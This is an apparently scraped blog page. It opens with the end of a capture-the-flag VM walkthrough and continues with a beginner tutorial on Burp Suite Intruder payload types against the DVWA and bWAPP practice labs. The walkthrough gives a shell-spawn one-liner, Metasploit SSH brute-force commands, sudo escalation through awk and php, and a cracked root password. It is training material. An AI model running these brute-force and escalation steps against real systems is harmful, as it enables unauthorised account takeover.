python -c “import pty; pty.spawn(‘/bin/bash’)”

we find a few files when we open nb-latin we find it contains a few password.

We download the ‘nb-latin’ file to use it to bruteforce ssh using the username we found earlier.

We use metasploit to bruteforce ssh using the new password file we found.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.18

msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt

msf auxiliary(scanner/ssh/ssh_login) > set pass_file nb-latin

msf auxiliary(scanner/ssh/ssh_login) > run

We find the password to be custodio for nick. Now once we login through ssh we check the sudoers list and there are 2 files we can a user terry.

When we run invoke.sh we find it asks for program as arguments. So we try to run /bin/bash along with the shell script.

sudo -u terry /home/nick/invoke.sh /bin/bash

Now we are login as terry, we again check the sudoers list. We find that we can run awk as user halle. So we spawn a shell using awk as user halle.

sudo -u halle awk ‘BEGIN {system(“/bin/bash -I”)}’

As soon as we spawn a shell we login as halle. We again check sudoers list and find we can run php as user chuck. When we spawn a tty shell using chuck it crashes. So we create a php file to enumerate directories. We find a directory called .deleted/

echo ” > /tmp/shell.php

sudo -u chuck php /tmp/shell.php

When we go inside .deleted folder we find a file deleted.

echo ” > /tmp/shell.php

sudo -u chuck php /tmp/shell.php

Now we create a php file to open the file called deleted.

echo ” > /tmp/shell.php

sudo -u chuck php /tmp/shell.php

Once we open the file we get a hint to create a password in which ‘e’ is used thrice, [c,r,b,a] are used twice and [h,w,m,y] are used once that makes the password 15 characters long. Also the password starts with che and ends with rry and contains baca in between.

We use crunch to create dictionaries with che at start and rry at end with baca at different positions.

We then merge the all dictionaries into one using dymerge.

We add root to the dictionary we used first to brute-force ssh.

Now we use metasploit to bruteforce ssh using the the new dictionaries.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.18

msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt

msf auxiliary(scanner/ssh/ssh_login) > set pass_file password.txt

msf auxiliary(scanner/ssh/ssh_login) > run

Now we find the username as ‘root’ and password to be ‘chewbacabemerry’. Now we take the session and we are login as root.

Beginners Guide to Burpsuite Payloads (Part 1)

January 21, 2018, 10:43 am

≫ Next: Burpsuite Encoder & Decoder Tutorial

≪ Previous: Hack the VM Cyberry:1(Boot2root Challenge)

$

0

0

Hello friends!! Today we are discussing about the “Types of Payload in Burp Suite”. Burp Suite is an application which is used for testing Web application security. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. This tool is written in JAVA and is developed by PortSwigger Security. We are going to use the Intruder feature of Burp Suite, it is used to brute force web applications. There are 18 types of payloads in intruder i.e.  

·         Simple list

·         Runtime File

·         Case Modification

·         Numbers

·         Brute Forcer

·         Character substitution

·         Custom iterator

·         Recursive grep

·         Illegal Unicode

·         Character blocks

·         Dates

·         Brute Forcer

·         Null Payloads

·         Character frober

·         Bit Flipper

·         Username generator

·         ECB block shuffler

·         Extension Generated

·         Copy other payload

Simple List

This is one of the simple types of payload, as it allows you to configure a short Dictionary of strings which are used as payload.

First, we intercept the request of the login page in the DVWA LAB, where we have given a random username and password. Then click on login, the burp suite will capture the request of the login page.

Send the captured request totheIntruder by clicking on the Action Tab and follow given below step. Now open the Intruder tabthen select positions and you can observe the highlighted username and password and follow the given below step for selecting payload position.

·         Press on the Clear button given at right of window frame.  

·         Now we will select the fields where we want to attack which is the username and password and click on Add button.

·         Choose the Attack type as Cluster Bomb.

·         In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

So now, go to Payloads tab and the select 1from Payload set (this ‘1’ denotes the first file to be selected). Then click on Loadbutton and select your dictionary file for username.

Now select 2in the Payload set and again give the dictionary file for the password. Select Start Attack in the Intruder menu as shown in the image.

Now the burp suite will do its work, match the valid combination of username and password and will give you the correct password and username. The moment it will find the correct value, it will change the value of length as shown.

And to confirm the username and password matched, we will give the matched username and password in the DVWA LAB login page. We will see a message “Welcome to the password protected area admin” which shows are success in the simple list payload attack.

Runtime File
This type of payload allows you to configure a file which reads the payload strings at runtime. This type of payload is needed when we require large list of payloads, to avoid holding the entire list in memory. This payload allows you to configure large list of strings which overcomes the simple list payload type.

First, we have intercepted the request of the login page in the DVWA LAB, where we have given a random username and a random password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request totheIntruder and follow given below step. Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

·         Press on the Clear button given at right of window frame. 

·         Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.

·         Choose the Attack type as sniper.

·         In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the “Payload type” as Runtime File and then give the path of dictionary in the “payload options” as /usr/share/wordists/rockyou.txtwhich is the largest dictionary in Kali Linux. Select Start Attack in the Intruder menu.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

Case Modification

This type of payload allows you to configure a list of strings and apply various case modifications to each item on the list. This is useful in password guessing attacks, for generating case variations on dictionary words.

The following case modification rules can be selected:

• No change - The item is used without being modified.
• To lower case - All letters in the item are converted to lower case.
• To upper case - All letters in the item are converted to upper case.
• To Proper name - The first letter in the item is converted to upper case, and the remaining letters are converted to lower case.
• To Proper Name - The first letter in the item is converted to upper case, and the remaining letters are not changed.

For example, if we select all the modification options, then the item "Raj Chandel" will generate the following payloads:

Raj Chandel

raj chandel

RAJ CHANDEL

Raj chandel

First, we intercept the request of the login page in the DVWA LAB, where we have given a random username and a random password. Then click on login , the burp suite will capture the request of the login page in the intercept tab. Send the captured request totheIntruder by right clicking on the space and selecting Send to Intruder option or simply press ctrl + i.

Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

·         Press on the Clear button given at right of window frame. 

·         Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.

·         Choose the Attack type as sniper.

·         In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the “Payload” type as Case Modification, we have selected the No change and to lower casefields in the “payload options” of the case modification as shown in the image. We have added a default Password dictionary from the Add from listfield in the payload options. Select Start Attack in the Intruder menu as shown in the image.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

Numbers

This type of payload generates numeric payloads within a given range and in a specified format.

The following options are available in this payload:

• Number range:

·         Type - the type options describes that the numbers should be generated sequentially or randomly.

·         From - If numbers are being generated sequentially, this is the value of the first number that will be generated.

·         To - If numbers are being generated sequentially, this value of the last number that will be generated. It is said as the highest possible number that may be randomly generated.

·         Step - the step option is used when numbers are being generated sequentially and specifies the increment in the successive numbers.

·         How many - This option is available when numbers are being generated randomly, and specifies the number of payloads that will be generated

First, we intercept the request of the login page in the Bwapp Lab, where we have given a random username and a random password. Then click on login, the burp suite will capture the request of the login page.

Send the captured request tothe Intruder and follow given below step. Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

·         Press on the Clear button given at right of window frame. 

·         Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.

·         Choose the Attack type as sniper.

·         In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the Payload type as Numbers where we have set the number range from 100 to 150 and we have set the step as 1 as shown in the image, select Start Attack in the Intruder menu.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

As the password matches with a number which is between the given number range. And to confirm the password matched, we will give the password in the Bwapp LAB login page, which will successfully log us into the Bwapp lab. This shows our success in the attack.

Brute Forcer

This type of payload generates a payload of specified lengths that contain all permutations of list of characters in the given string.

The following options are available:

• Character set - The set of characters to be used in the payloads. Note that the total number of payloads increases exponentially with the size of this set.
• Min length - The length of the shortest payload.

·         Max length - The length of the longest payload.

First, we intercept the request of the login page in the Bwapp LAB, where we have given a random username and a random password. Then click on login, the burp suite will capture the request of the login page.

Send the captured request totheIntruder and follow given below step. Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

·         Press on the Clear button given at right of window frame. 

·         Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.

·         Choose the Attack type as sniper.

·         In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the “Payload type” as Brute Forcer where we can give any kind of input into the “character

set” as shown in the figure , as we have given 213 and we have set the Min length as 3 and Max length as

3 as shown in the image. We can manually give the Min length and Max length as per your need. Select 

Start Attack in the Intruder menu as shown in the image.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

Great!! We have used Top 5 payloads of Burpsuite for login page brute force attack successfully.

Note: In this articles (part-1) we will be performing top 5 payload types and the rest of the payload types will be discussed in the (part-2) of this article.